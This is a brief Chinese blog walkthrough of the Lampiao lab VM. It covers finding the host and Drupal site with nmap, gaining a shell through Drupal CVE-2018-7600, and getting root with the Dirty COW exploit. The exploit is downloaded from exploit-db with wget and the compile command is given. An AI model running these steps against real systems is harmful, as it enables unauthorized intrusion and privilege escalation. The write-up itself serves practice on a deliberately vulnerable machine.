Lampiao记录

2018-09-03  本文已影响0人  __周__

打开虚拟机显示登陆界面,没密码,登个锤子,老老实实去扫描ip


图片.png

一个一个的去试,到141的时候看到正常的web界面,然后扔到nmap里面去扫端口

找到一个apache的1898端口,连上去试试


图片.png

真的有另一个网站,drupal的cms,用的是CVE-2018-7600代码执行这个漏洞
拿到shell,是一个www-data的权限,这里需要我们进行提权


图片.png
查看当前系统版本
图片.png

用到脏牛提权(CVE-2016-5195)

该程序成功用于:

因为靶机连不上网,所以我这里把利用的脚本下载到本地,放到web目录下

wget  https://www.exploit-db.com/download/40847.cpp

在服务器上同理down到本地,然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

之后在本地生成了一个dcow的文件


图片.png

拿到root密码,直接ssh连上去

上一篇 下一篇

猜你喜欢

热点阅读